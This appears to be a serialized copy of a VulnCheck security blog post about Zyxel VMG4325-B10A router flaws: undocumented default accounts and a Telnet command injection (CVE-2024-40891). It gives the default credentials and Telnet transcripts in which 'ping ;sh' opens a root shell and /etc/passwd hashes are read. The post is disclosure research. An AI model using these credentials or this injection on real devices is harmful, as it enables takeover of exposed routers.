>\u003C\u002F",[1373,56583,56471],{"class":6300},[1373,56585,6765],{"class":1383},[1373,56587,56588,56590,56592],{"class":1375,"line":4849},[1373,56589,46627],{"class":1383},[1373,56591,56399],{"class":6300},[1373,56593,6765],{"class":1383},[1373,56595,56596,56598,56600,56602,56604,56606,56608,56610],{"class":1375,"line":4877},[1373,56597,11852],{"class":1383},[1373,56599,56399],{"class":6300},[1373,56601,56402],{"class":8252},[1373,56603,5417],{"class":1383},[1373,56605,183],{"class":1387},[1373,56607,353],{"class":1391},[1373,56609,183],{"class":1387},[1373,56611,6765],{"class":1383},[1373,56613,56614,56616,56619,56621,56623,56625,56627],{"class":1375,"line":4915},[1373,56615,8246],{"class":1383},[1373,56617,56618],{"class":6300},"GroupKey",[1373,56620,5384],{"class":1383},[1373,56622,353],{"class":4640},[1373,56624,46627],{"class":1383},[1373,56626,56618],{"class":6300},[1373,56628,6765],{"class":1383},[1373,56630,56631,56633,56635,56637,56639,56641,56643],{"class":1375,"line":4931},[1373,56632,8246],{"class":1383},[1373,56634,56419],{"class":6300},[1373,56636,5384],{"class":1383},[1373,56638,56424],{"class":4640},[1373,56640,46627],{"class":1383},[1373,56642,56419],{"class":6300},[1373,56644,6765],{"class":1383},[1373,56646,56647,56649,56651,56653,56656,56658,56660],{"class":1375,"line":4947},[1373,56648,8246],{"class":1383},[1373,56650,30775],{"class":6300},[1373,56652,5384],{"class":1383},[1373,56654,56655],{"class":4640},"User",[1373,56657,46627],{"class":1383},[1373,56659,30775],{"class":6300},[1373,56661,6765],{"class":1383},[1373,56663,56664,56666,56668,56670,56672,56674,56676],{"class":1375,"line":4952},[1373,56665,8246],{"class":1383},[1373,56667,56454],{"class":6300},[1373,56669,5384],{"class":1383},[1373,56671,353],{"class":4640},[1373,56673,46627],{"class":1383},[1373,56675,56454],{"class":6300},[1373,56677,6765],{"class":1383},[1373,56679,56680,56682,56684,56686,56688,56690,56692,56694],{"class":1375,"line":6776},[1373,56681,8246],{"class":1383},[1373,56683,56471],{"class":6300},[1373,56685,56402],{"class":8252},[1373,56687,5417],{"class":1383},[1373,56689,183],{"class":1387},[1373,56691,467],{"class":1391},[1373,56693,183],{"class":1387},[1373,56695,6765],{"class":1383},[1373,56697,56698,56700,56702,56704,56707,56709,56711],{"class":1375,"line":6781},[1373,56699,8246],{"class":1383},[1373,56701,56490],{"class":6300},[1373,56703,5384],{"class":1383},[1373,56705,56706],{"class":4640},"zyuser",[1373,56708,46627],{"class":1383},[1373,56710,56490],{"class":6300},[1373,56712,6765],{"class":1383},[1373,56714,56715,56717,56719,56721,56723,56725,56727],{"class":1375,"line":7524},[1373,56716,8246],{"class":1383},[1373,56718,56507],{"class":6300},[1373,56720,5384],{"class":1383},[1373,56722,56512],{"class":4640},[1373,56724,46627],{"class":1383},[1373,56726,56507],{"class":6300},[1373,56728,6765],{"class":1383},[1373,56730,56731,56733,56735,56737,56739,56741,56743],{"class":1375,"line":7530},[1373,56732,8246],{"class":1383},[1373,56734,56525],{"class":6300},[1373,56736,5384],{"class":1383},[1373,56738,445],{"class":4640},[1373,56740,46627],{"class":1383},[1373,56742,56525],{"class":6300},[1373,56744,6765],{"class":1383},[1373,56746,56747,56749,56751,56753,56755,56757,56759],{"class":1375,"line":7546},[1373,56748,8246],{"class":1383},[1373,56750,56542],{"class":6300},[1373,56752,5384],{"class":1383},[1373,56754,467],{"class":4640},[1373,56756,46627],{"class":1383},[1373,56758,56542],{"class":6300},[1373,56760,6765],{"class":1383},[1373,56762,56763,56765,56767],{"class":1375,"line":7571},[1373,56764,56557],{"class":1383},[1373,56766,56471],{"class":6300},[1373,56768,6765],{"class":1383},[1373,56770,56771,56773,56775,56777,56779,56781,56783,56785,56787,56789],{"class":1375,"line":7598},[1373,56772,8246],{"class":1383},[1373,56774,56471],{"class":6300},[1373,56776,56570],{"class":8252},[1373,56778,5417],{"class":1383},[1373,56780,183],{"class":1387},[1373,56782,353],{"class":1391},[1373,56784,183],{"class":1387},[1373,56786,56581],{"class":1383},[1373,56788,56471],{"class":6300},[1373,56790,6765],{"class":1383},[1373,56792,56793,56795,56797],{"class":1375,"line":7615},[1373,56794,46627],{"class":1383},[1373,56796,56399],{"class":6300},[1373,56798,6765],{"class":1383},[1373,56800,56801,56803,56805,56807,56809,56811,56813,56815,56817,56819],{"class":1375,"line":7635},[1373,56802,11852],{"class":1383},[1373,56804,56399],{"class":6300},[1373,56806,56570],{"class":8252},[1373,56808,5417],{"class":1383},[1373,56810,183],{"class":1387},[1373,56812,491],{"class":1391},[1373,56814,183],{"class":1387},[1373,56816,56581],{"class":1383},[1373,56818,56399],{"class":6300},[1373,56820,6765],{"class":1383},[1373,56822,56823,56825,56827],{"class":1375,"line":7640},[1373,56824,46627],{"class":1383},[1373,56826,56337],{"class":6300},[1373,56828,6765],{"class":1383},[18,56830,56831],{},"As shown above, the VMG4325-B10A is provisioned with three accounts:",[1789,56833,56834,56836,56839],{},[25,56835,55060],{},[25,56837,56838],{},"admin:1234",[25,56840,55064],{},[18,56842,2245,56843,56845,56846,56851,56852,56857,56858,56860],{},[886,56844,56351],{}," credentials were previously documented under ",[47,56847,56850],{"href":56848,"rel":56849},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002Fcve-2017-18371",[51],"CVE-2017-18371",", but that CVE currently only associates the account with ",[47,56853,56856],{"href":56854,"rel":56855},"https:\u002F\u002Fwww.amazon.com\u002FZyxel-ADSL-Wireless-Gateway-P660HN-51\u002Fdp\u002FB0051SHXPQ",[51],"Zyxel P660HN-51"," routers. However, we now see this vulnerability extending to the VMG series as well. The functionality of the ",[886,56859,56351],{}," user is poorly documented by CVE-2017-18371, so before proceeding, we’ll take a quick detour to explore it further.",[18,56862,56863,56864,56866,56867,56869,56870,56872,56873,4606],{},"These credentials are not visible via the web interface; notably, the ",[886,56865,56351],{}," account has additional functionality in the Telnet interface. As previously discussed, ",[886,56868,55366],{}," handles Telnet commands. If the standard ",[886,56871,55370],{}," does not recognize a command, it falls back to the aptly named ",[886,56874,56875],{},"cli_processHiddenCmd",[18,56877,56878],{},[68,56879],{":width":10862,"alt":56880,"src":56881},"Decompiled Process Hidden Command Call","\u002Fblog\u002Fzyxel-telnet-vulns\u002FhiddenCmd.png",[18,56883,56884,56886,56887,56889],{},[886,56885,56875],{}," handles a list of commands that are not listed in the ",[886,56888,39134],{}," menu and are only available to the supervisor user. While the list of hidden commands is short, it includes several powerful options:",[1789,56891,56892,56895,56898,56901,56904,56907],{},[25,56893,56894],{},"dumpmem",[25,56896,56897],{},"ebtables",[25,56899,56900],{},"iptables",[25,56902,56903],{},"logread",[25,56905,56906],{},"setmem",[25,56908,2186],{},[18,56910,5623,56911,56913,56914,56916],{},[886,56912,2186],{}," command provides a fully interactive ",[886,56915,55791],{}," shell, granting the user unrestricted access to the system.",[1354,56918,56920],{"className":55473,"code":56919,"language":55475,"meta":219,"style":219},"albinolobster@mournland:~\u002Fresearch\u002Fmisc-exploits$ telnet 192.168.0.1\nTrying 192.168.0.1...\nConnected to 192.168.0.1.\nEscape character is '^]'.\nZyxel VMG4325-B10A\nLogin: supervisor\nPassword:\n > sh\n\n\nBusyBox v1.17.2 (2017-06-15 12:25:20 CST) built-in shell (ash)\nEnter 'help' for a list of built-in commands.\n\n#\n",[886,56921,56922,56931,56937,56945,56961,56967,56974,56978,56984,56988,56992,57010,57032,57036],{"__ignoreMap":219},[1373,56923,56924,56927,56929],{"class":1375,"line":1376},[1373,56925,56926],{"class":2206},"albinolobster@mournland:~\u002Fresearch\u002Fmisc-exploits$",[1373,56928,55485],{"class":1391},[1373,56930,55488],{"class":5467},[1373,56932,56933,56935],{"class":1375,"line":220},[1373,56934,55493],{"class":2206},[1373,56936,55496],{"class":1391},[1373,56938,56939,56941,56943],{"class":1375,"line":1266},[1373,56940,19141],{"class":2206},[1373,56942,55503],{"class":1391},[1373,56944,55506],{"class":1391},[1373,56946,56947,56949,56951,56953,56955,56957,56959],{"class":1375,"line":1852},[1373,56948,55511],{"class":2206},[1373,56950,55514],{"class":1391},[1373,56952,55517],{"class":1391},[1373,56954,4713],{"class":1387},[1373,56956,55522],{"class":1391},[1373,56958,1388],{"class":1387},[1373,56960,55527],{"class":1391},[1373,56962,56963,56965],{"class":1375,"line":4692},[1373,56964,55532],{"class":2206},[1373,56966,55535],{"class":1391},[1373,56968,56969,56971],{"class":1375,"line":4724},[1373,56970,55540],{"class":2206},[1373,56972,56973],{"class":1391}," supervisor\n",[1373,56975,56976],{"class":1375,"line":4756},[1373,56977,55548],{"class":2206},[1373,56979,56980,56982],{"class":1375,"line":4768},[1373,56981,11741],{"class":1397},[1373,56983,55563],{"class":2206},[1373,56985,56986],{"class":1375,"line":4792},[1373,56987,6520],{"emptyLinePlaceholder":237},[1373,56989,56990],{"class":1375,"line":4798},[1373,56991,6520],{"emptyLinePlaceholder":237},[1373,56993,56994,56996,56998,57000,57002,57004,57006,57008],{"class":1375,"line":4806},[1373,56995,55585],{"class":2206},[1373,56997,55588],{"class":1391},[1373,56999,55591],{"class":4640},[1373,57001,55594],{"class":1391},[1373,57003,55597],{"class":1391},[1373,57005,55788],{"class":4640},[1373,57007,55791],{"class":2206},[1373,57009,11875],{"class":4640},[1373,57011,57012,57014,57016,57018,57020,57022,57024,57026,57028,57030],{"class":1375,"line":4817},[1373,57013,55798],{"class":2206},[1373,57015,4713],{"class":1387},[1373,57017,39134],{"class":1391},[1373,57019,1388],{"class":1387},[1373,57021,55807],{"class":1391},[1373,57023,52105],{"class":1391},[1373,57025,55812],{"class":1391},[1373,57027,55815],{"class":1391},[1373,57029,55818],{"class":1391},[1373,57031,55821],{"class":1391},[1373,57033,57034],{"class":1375,"line":4825},[1373,57035,6520],{"emptyLinePlaceholder":237},[1373,57037,57038],{"class":1375,"line":4835},[1373,57039,56298],{"class":4630},[18,57041,36341,57042,57044,57045,57047],{},[886,57043,56351],{}," has hidden privileges and access to undocumented functionality, the provisioned ",[886,57046,56706],{}," is different. It is not a concealed account with secret commands but instead appears to be a secondary user with elevated privileges, despite being fully visible in the user table.",[18,57049,57050],{},[68,57051],{":width":10862,"alt":55426,"src":57052},"\u002Fblog\u002Fzyxel-telnet-vulns\u002Fusertable.png",[18,57054,57055,57056,57058,57059,59],{},"The web interface even prompts for a password change upon logging in as ",[886,57057,56706],{},", but given the lack of a clear purpose for this redundant account, it's unlikely that many users bother to reset the password. Attackers, however, have certainly taken notice. Our colleagues at GreyNoise have observed activity targeting this account, and notably, its credentials were also used by ",[47,57060,57063],{"href":57061,"rel":57062},"https:\u002F\u002Fgithub.com\u002FJeremyNGalloway\u002Fmod_plaintext.py\u002Fblob\u002Fmaster\u002Fmod_plaintext.py",[51],"BrickerBot",[18,57065,57066],{},"Undocumented, or poorly documented, default accounts with easily guessable passwords that are unlikely to be changed pose a significant security risk. We were unable to find an official manual for the VMG4325-B10A beyond a 2012 version and 2015 release notes, neither of which mention the zyuser account, leaving little to no documentation on its existence.",[18,57068,57069,57070,57075,57076,57078],{},"While it may not be a popular stance, ",[47,57071,57074],{"href":57072,"rel":57073},"https:\u002F\u002Fcwe.mitre.org\u002Fdata\u002Fdefinitions\u002F1392.html",[51],"CWE-1392"," (Use of Default Credentials) exists for a reason. Given that the ",[886,57077,55064],{}," credentials ultimately enable full remote code execution via CVE-2024-40891, we believe it is reasonable to assign this issue its own identifier: CVE-2025-0890.",[18,57080,57081,57082,57084,57085,57087],{},"To reiterate, the ",[886,57083,56706],{}," account cannot use the hidden ",[886,57086,2186],{}," command via Telnet. Instead, it can only achieve code execution through the command injection (CVE-2024-40891).",[1354,57089,57091],{"className":55473,"code":57090,"language":55475,"meta":219,"style":219},"albinolobster@mournland:~$ telnet 192.168.0.1\nTrying 192.168.0.1...\nConnected to 192.168.0.1.\nEscape character is '^]'.\nZyxel VMG4325-B10A\nLogin: zyuser\nPassword:\n > sh\ntelnetd:error:694.808:processInput:472:unrecognized command sh\n > ping ;sh\nBusyBox v1.17.2 (2017-06-15 12:25:20 CST) multi-call binary.\n\nUsage: ping [OPTIONS] HOST\n\nSend ICMP ECHO_REQUEST packets to network hosts\n\nOptions:\n -4, -6 Force IP or IPv6 name resolution\n -c CNT Send only CNT pings\n -s SIZE Send SIZE data bytes in packets (default:56)\n -I IFACE\u002FIP Use interface or IP address as source\n -W SEC Seconds to wait for the first response (default:10)\n (after all -c CNT packets are sent)\n -w SEC Seconds until ping exits (default:infinite)\n (can exit earlier with -c CNT)\n -q Quiet, only displays output at start\n and when finished\n\n\n\nBusyBox v1.17.2 (2017-06-15 12:25:20 CST) built-in shell (ash)\nEnter 'help' for a list of built-in commands.\n\n# cat \u002Fetc\u002Fpasswd\nsupervisor:gNvaS9TkEwk..:0:0:Administrator:\u002F:\u002Fbin\u002Fsh\nnobody:Mm\u002FNWrZmKMrT2:99:99:nobody for ftp:\u002F:\u002Fbin\u002Ffalse\nadmin:d7uXUhqhH7hew:100:0:Administrator:\u002F:\u002Fbin\u002Fsh\nzyuser:hH7gnvw0ISLfg:101:2:User:\u002F:\u002Fbin\u002Fsh\n",[886,57092,57093,57101,57107,57115,57131,57137,57143,57147,57153,57162,57175,57189,57193,57202,57206,57228,57232,57236,57261,57280,57307,57334,57364,57389,57409,57431,57453,57464,57468,57472,57476,57494,57516,57520,57525,57530,57543,57548],{"__ignoreMap":219},[1373,57094,57095,57097,57099],{"class":1375,"line":1376},[1373,57096,55482],{"class":2206},[1373,57098,55485],{"class":1391},[1373,57100,55488],{"class":5467},[1373,57102,57103,57105],{"class":1375,"line":220},[1373,57104,55493],{"class":2206},[1373,57106,55496],{"class":1391},[1373,57108,57109,57111,57113],{"class":1375,"line":1266},[1373,57110,19141],{"class":2206},[1373,57112,55503],{"class":1391},[1373,57114,55506],{"class":1391},[1373,57116,57117,57119,57121,57123,57125,57127,57129],{"class":1375,"line":1852},[1373,57118,55511],{"class":2206},[1373,57120,55514],{"class":1391},[1373,57122,55517],{"class":1391},[1373,57124,4713],{"class":1387},[1373,57126,55522],{"class":1391},[1373,57128,1388],{"class":1387},[1373,57130,55527],{"class":1391},[1373,57132,57133,57135],{"class":1375,"line":4692},[1373,57134,55532],{"class":2206},[1373,57136,55535],{"class":1391},[1373,57138,57139,57141],{"class":1375,"line":4724},[1373,57140,55540],{"class":2206},[1373,57142,55543],{"class":1391},[1373,57144,57145],{"class":1375,"line":4756},[1373,57146,55548],{"class":2206},[1373,57148,57149,57151],{"class":1375,"line":4768},[1373,57150,11741],{"class":1397},[1373,57152,55563],{"class":2206},[1373,57154,57155,57158,57160],{"class":1375,"line":4792},[1373,57156,57157],{"class":2206},"telnetd:error:694.808:processInput:472:unrecognized",[1373,57159,16726],{"class":1391},[1373,57161,55563],{"class":1391},[1373,57163,57164,57166,57169,57172],{"class":1375,"line":4798},[1373,57165,11741],{"class":1397},[1373,57167,57168],{"class":2206}," ping",[1373,57170,57171],{"class":1383}," ;",[1373,57173,57174],{"class":2206},"sh\n",[1373,57176,57177,57179,57181,57183,57185,57187],{"class":1375,"line":4806},[1373,57178,55585],{"class":2206},[1373,57180,55588],{"class":1391},[1373,57182,55591],{"class":4640},[1373,57184,55594],{"class":1391},[1373,57186,55597],{"class":1391},[1373,57188,55600],{"class":4640},[1373,57190,57191],{"class":1375,"line":4817},[1373,57192,6520],{"emptyLinePlaceholder":237},[1373,57194,57195,57197,57199],{"class":1375,"line":4825},[1373,57196,55609],{"class":2206},[1373,57198,57168],{"class":1391},[1373,57200,57201],{"class":4640}," [OPTIONS] HOST\n",[1373,57203,57204],{"class":1375,"line":4835},[1373,57205,6520],{"emptyLinePlaceholder":237},[1373,57207,57208,57211,57214,57217,57220,57222,57225],{"class":1375,"line":4843},[1373,57209,57210],{"class":2206},"Send",[1373,57212,57213],{"class":1391}," ICMP",[1373,57215,57216],{"class":1391}," ECHO_REQUEST",[1373,57218,57219],{"class":1391}," packets",[1373,57221,55503],{"class":1391},[1373,57223,57224],{"class":1391}," network",[1373,57226,57227],{"class":1391}," hosts\n",[1373,57229,57230],{"class":1375,"line":4849},[1373,57231,6520],{"emptyLinePlaceholder":237},[1373,57233,57234],{"class":1375,"line":4877},[1373,57235,55651],{"class":2206},[1373,57237,57238,57241,57244,57247,57250,57253,57256,57258],{"class":1375,"line":4915},[1373,57239,57240],{"class":2206}," -4,",[1373,57242,57243],{"class":2209}," -6",[1373,57245,57246],{"class":1391}," Force",[1373,57248,57249],{"class":1391}," IP",[1373,57251,57252],{"class":1391}," or",[1373,57254,57255],{"class":1391}," IPv6",[1373,57257,46496],{"class":1391},[1373,57259,57260],{"class":1391}," resolution\n",[1373,57262,57263,57266,57269,57272,57275,57277],{"class":1375,"line":4931},[1373,57264,57265],{"class":2206}," -c",[1373,57267,57268],{"class":1391}," CNT",[1373,57270,57271],{"class":1391}," Send",[1373,57273,57274],{"class":1391}," only",[1373,57276,57268],{"class":1391},[1373,57278,57279],{"class":1391}," pings\n",[1373,57281,57282,57285,57288,57291,57293,57296,57299,57302,57304],{"class":1375,"line":4947},[1373,57283,57284],{"class":2206}," -s",[1373,57286,57287],{"class":1391}," SIZE",[1373,57289,57290],{"class":1391}," Send",[1373,57292,57287],{"class":1391},[1373,57294,57295],{"class":1391}," data",[1373,57297,57298],{"class":1391}," bytes",[1373,57300,57301],{"class":1391}," in",[1373,57303,57219],{"class":1391},[1373,57305,57306],{"class":4640}," (default:56)\n",[1373,57308,57309,57312,57315,57318,57321,57323,57325,57328,57331],{"class":1375,"line":4952},[1373,57310,57311],{"class":2206}," -I",[1373,57313,57314],{"class":1391}," IFACE\u002FIP",[1373,57316,57317],{"class":1391}," Use",[1373,57319,57320],{"class":1391}," interface",[1373,57322,57252],{"class":1391},[1373,57324,57249],{"class":1391},[1373,57326,57327],{"class":1391}," address",[1373,57329,57330],{"class":1391}," as",[1373,57332,57333],{"class":1391}," source\n",[1373,57335,57336,57339,57342,57345,57347,57350,57352,57355,57358,57361],{"class":1375,"line":6776},[1373,57337,57338],{"class":2206}," -W",[1373,57340,57341],{"class":1391}," SEC",[1373,57343,57344],{"class":1391}," Seconds",[1373,57346,55503],{"class":1391},[1373,57348,57349],{"class":1391}," wait",[1373,57351,55807],{"class":1391},[1373,57353,57354],{"class":1391}," the",[1373,57356,57357],{"class":1391}," first",[1373,57359,57360],{"class":1391}," response",[1373,57362,57363],{"class":4640}," (default:10)\n",[1373,57365,57366,57369,57372,57375,57377,57379,57381,57384,57387],{"class":1375,"line":6781},[1373,57367,57368],{"class":1383}," (",[1373,57370,57371],{"class":2206},"after",[1373,57373,57374],{"class":1391}," all",[1373,57376,45587],{"class":2209},[1373,57378,57268],{"class":1391},[1373,57380,57219],{"class":1391},[1373,57382,57383],{"class":1391}," are",[1373,57385,57386],{"class":1391}," sent",[1373,57388,11875],{"class":1383},[1373,57390,57391,57394,57396,57398,57401,57403,57406],{"class":1375,"line":7524},[1373,57392,57393],{"class":2206}," -w",[1373,57395,57341],{"class":1391},[1373,57397,57344],{"class":1391},[1373,57399,57400],{"class":1391}," until",[1373,57402,57168],{"class":1391},[1373,57404,57405],{"class":1391}," exits",[1373,57407,57408],{"class":4640}," (default:infinite)\n",[1373,57410,57411,57413,57416,57419,57422,57425,57427,57429],{"class":1375,"line":7530},[1373,57412,57368],{"class":1383},[1373,57414,57415],{"class":2206},"can",[1373,57417,57418],{"class":1391}," exit",[1373,57420,57421],{"class":1391}," earlier",[1373,57423,57424],{"class":1391}," with",[1373,57426,45587],{"class":2209},[1373,57428,57268],{"class":1391},[1373,57430,11875],{"class":1383},[1373,57432,57433,57436,57439,57441,57444,57447,57450],{"class":1375,"line":7546},[1373,57434,57435],{"class":2206}," -q",[1373,57437,57438],{"class":1391}," Quiet,",[1373,57440,57274],{"class":1391},[1373,57442,57443],{"class":1391}," displays",[1373,57445,57446],{"class":1391}," output",[1373,57448,57449],{"class":1391}," at",[1373,57451,57452],{"class":1391}," start\n",[1373,57454,57455,57458,57461],{"class":1375,"line":7571},[1373,57456,57457],{"class":2206}," and",[1373,57459,57460],{"class":1391}," when",[1373,57462,57463],{"class":1391}," finished\n",[1373,57465,57466],{"class":1375,"line":7598},[1373,57467,6520],{"emptyLinePlaceholder":237},[1373,57469,57470],{"class":1375,"line":7615},[1373,57471,6520],{"emptyLinePlaceholder":237},[1373,57473,57474],{"class":1375,"line":7635},[1373,57475,6520],{"emptyLinePlaceholder":237},[1373,57477,57478,57480,57482,57484,57486,57488,57490,57492],{"class":1375,"line":7640},[1373,57479,55585],{"class":2206},[1373,57481,55588],{"class":1391},[1373,57483,55591],{"class":4640},[1373,57485,55594],{"class":1391},[1373,57487,55597],{"class":1391},[1373,57489,55788],{"class":4640},[1373,57491,55791],{"class":2206},[1373,57493,11875],{"class":4640},[1373,57495,57496,57498,57500,57502,57504,57506,57508,57510,57512,57514],{"class":1375,"line":7648},[1373,57497,55798],{"class":2206},[1373,57499,4713],{"class":1387},[1373,57501,39134],{"class":1391},[1373,57503,1388],{"class":1387},[1373,57505,55807],{"class":1391},[1373,57507,52105],{"class":1391},[1373,57509,55812],{"class":1391},[1373,57511,55815],{"class":1391},[1373,57513,55818],{"class":1391},[1373,57515,55821],{"class":1391},[1373,57517,57518],{"class":1375,"line":7672},[1373,57519,6520],{"emptyLinePlaceholder":237},[1373,57521,57522],{"class":1375,"line":7688},[1373,57523,57524],{"class":4630},"# cat \u002Fetc\u002Fpasswd\n",[1373,57526,57527],{"class":1375,"line":7709},[1373,57528,57529],{"class":2206},"supervisor:gNvaS9TkEwk..:0:0:Administrator:\u002F:\u002Fbin\u002Fsh\n",[1373,57531,57532,57535,57537,57540],{"class":1375,"line":7714},[1373,57533,57534],{"class":2206},"nobody:Mm\u002FNWrZmKMrT2:99:99:nobody",[1373,57536,55807],{"class":1391},[1373,57538,57539],{"class":1391}," ftp:\u002F:\u002Fbin\u002F",[1373,57541,57542],{"class":7054},"false\n",[1373,57544,57545],{"class":1375,"line":7722},[1373,57546,57547],{"class":2206},"admin:d7uXUhqhH7hew:100:0:Administrator:\u002F:\u002Fbin\u002Fsh\n",[1373,57549,57550],{"class":1375,"line":9903},[1373,57551,57552],{"class":2206},"zyuser:hH7gnvw0ISLfg:101:2:User:\u002F:\u002Fbin\u002Fsh\n",[1920,57554,57556],{"id":57555},"overlap-with-existing-research","Overlap with Existing Research",[18,57558,57559],{},"While finalizing this blog, VulnCheck conducted a final search for other work that might overlap with our research. We’ve identified three notable overlaps that align with or reinforce our finds:",[22,57561,57562,57589,57604],{},[25,57563,57564,57565,57570,57571,57576,57577,57582,57583,57588],{},"A chunk of the code for the Telnet service has been available on GitHub for 12 years and it even includes the ",[47,57566,57569],{"href":57567,"rel":57568},"https:\u002F\u002Fgithub.com\u002Fad7843\u002Fhi\u002Fblob\u002F8cc9b776ffef2c725c666dc0208031e03e6b85ed\u002Fcli.c#L396",[51],"hidden command logic",". It’s notable that talented researcher Jang Nguyen (aka ",[47,57572,57575],{"href":57573,"rel":57574},"https:\u002F\u002Fgithub.com\u002Ftestanull",[51],"testanull",", aka ",[47,57578,57581],{"href":57579,"rel":57580},"https:\u002F\u002Fx.com\u002Ftestanull",[51],"@testanull",") has a ",[47,57584,57587],{"href":57585,"rel":57586},"https:\u002F\u002Fgithub.com\u002Ftestanull\u002Fhi",[51],"fork"," of this repository.",[25,57590,57591,57592,57597,57598,57603],{},"In May 2023, NCCGroup published a blog titled, “",[47,57593,57596],{"href":57594,"rel":57595},"https:\u002F\u002Fwww.nccgroup.com\u002Fus\u002Fresearch-blog\u002Fnetgear-routers-a-playground-for-hackers\u002F",[51],"NETGEAR Routers: A Playground for Hackers?","” in which they describe the ",[47,57599,57602],{"href":57600,"rel":57601},"https:\u002F\u002Fwww.nccgroup.com\u002Fus\u002Fresearch-blog\u002Fnetgear-routers-a-playground-for-hackers\u002F#psv-2023-0008---telnet-default-account-privilege-escalation-breakout",[51],"authenticated command injection"," affecting the NETGEAR Nighthawk WiFi 6 Router (RAX30 AX2400). No CVE was assigned.",[25,57605,57606,57607,57612,57613,57620,57621,57623,57624,57626],{},"In July 2024, ",[47,57608,57611],{"href":57609,"rel":57610},"https:\u002F\u002Fgithub.com\u002Fkukas",[51],"Jirka Balhar"," published a blog titled, “",[47,57614,57617],{"href":57615,"rel":57616},"https:\u002F\u002Fblog.jirkabalhar.cz\u002F2024\u002F07\u002Fgaining-a-full-admin-shell-on-a-zyxel-gateway\u002F",[51],[1131,57618,57619],{},"Getting admin shell on a Zyxel gateway","” in which they describe using the ",[886,57622,5800],{}," account to invoke the hidden ",[886,57625,2186],{}," command on the Zyxel SBG3300. No CVE was assigned.",[1920,57628,1903],{"id":1902},[18,57630,57631],{},"The device’s default accounts and command injection vulnerabilities present a serious security risk, especially given their continued exploitation in the wild, as confirmed by GreyNoise. While these devices are aging and supposed to be out of support, thousands remain exposed online. The combination of default credentials and command injection makes them easy targets, highlighting the dangers of insecure default configurations and poor vulnerability transparency. Unsupported does not mean unexploited, and this research underscores the lasting impact of insecure legacy devices.",[61,57633,202],{"id":201},[18,57635,53821,57636,1246,57639,1246,57642,1255,57645],{},[47,57637,40447],{"href":53829,"rel":57638},[51],[47,57640,36637],{"href":53833,"rel":57641},[51],[47,57643,55229],{"href":53837,"rel":57644},[51],[47,57646,22211],{"href":53842,"rel":57647},[51],[18,57649,53846,57650,53850,57653,982,57656,1260],{},[47,57651,1233],{"href":2871,"rel":57652},[51],[47,57654,1245],{"href":45535,"rel":57655},[51],[47,57657,216],{"href":214,"rel":57658},[51],[2901,57660,57661],{},"html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .ss7Ak, html code.shiki .ss7Ak{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#6A737D;--shiki-default-font-style:inherit;--shiki-dark:#6A737D;--shiki-dark-font-style:inherit;--shiki-sepia:#88846F;--shiki-sepia-font-style:inherit}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sHsBP, html code.shiki .sHsBP{--shiki-light:#E53935;--shiki-default:#22863A;--shiki-dark:#85E89D;--shiki-sepia:#F92672}html pre.shiki code .s_lYk, html code.shiki .s_lYk{--shiki-light:#9C3EDA;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}",{"title":219,"searchDepth":220,"depth":220,"links":57663},[57664],{"id":201,"depth":220,"text":202},"2025-02-04","VulnCheck and partner GreyNoise discovered Zyxel-related vulnerabilities being targeted in the wild. In this blog, VulnCheck describes the vulnerabilities CVE-2024-40891 and 